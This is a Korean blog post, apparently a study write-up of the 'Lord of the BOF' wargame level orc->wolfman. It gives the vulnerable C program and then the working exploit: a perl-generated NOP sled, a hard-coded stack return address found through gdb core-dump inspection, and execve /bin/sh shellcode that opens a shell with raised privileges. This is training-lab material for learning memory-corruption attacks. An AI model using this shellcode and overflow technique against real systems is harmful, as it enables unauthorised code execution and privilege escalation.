반응형

/*1. Bash2 실행*/

[orc@localhost orc]$ bash2

/*2. 소스를 봅시다*/

[orc@localhost orc]$ cat wolfman.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);    //버퍼가 40바이트인데 40바이트를 모두 40으로 채워버립니다

}

/*여기서, 버퍼는 사용할 수 없다는 것을 알게됩니다. 그래서 대충 페이로드를 짜서 넣어봅니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` 

???????????????????????????????????????????????퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€

Segmentation fault (core dumped) //코더덤프☆를 주니까 까봅시다.

/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'*/

[orc@localhost orc]$ gdb -q wolvman core

Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j

                    X?R'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x99580b6a 0x2f2f6852   0x2f686873 0x896e6962

0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14    0x08048390

0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c    0x40013e90

0xbffffb10: 0x00000002 0xbffffc13     0xbffffc1d    0x00000000

0xbffffb20: 0xbffffc75    0xbffffc83         0xbffffc9a    0xbffffcb9

0xbffffb30: 0xbffffcdb    0xbffffce4     0xbffffea7    0xbffffec6

0xbffffb40: 0xbffffedf     0xbffffef4     0xbfffff0f      0xbfffff1a

0xbffffb50: 0xbfffff32     0xbfffff3e     0xbfffff46     0xbfffff50

0xbffffb60: 0xbfffff60     0xbfffff6e     0xbfffff7c         0xbfffff8d

0xbffffb70: 0xbfffff98     0xbfffffa7     0xbfffffe6     0x00000000

0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb90: 0x00000005 0x00000006

(gdb) 

0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8

0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8

0xbffffbd8: 0x00000010 0x0febfbff    0x0000000f 0xbffffc0e

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f

0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x580b6a90

(gdb) quit

/*제가 이 문제를 풀었을때는 쉘코드가 0xbffffc37지점에 있었는데 말이죠..;;....... 

암튼 공격해봤습니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????


bash$ exit     //잘되네여

exit

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????

bash$ my-pass

euid = 505    //땋

이번엔.. 쉽게풀었네요ㅋㅋ

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkelf->orge  (0) 2013.11.22
wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30

+ Recent posts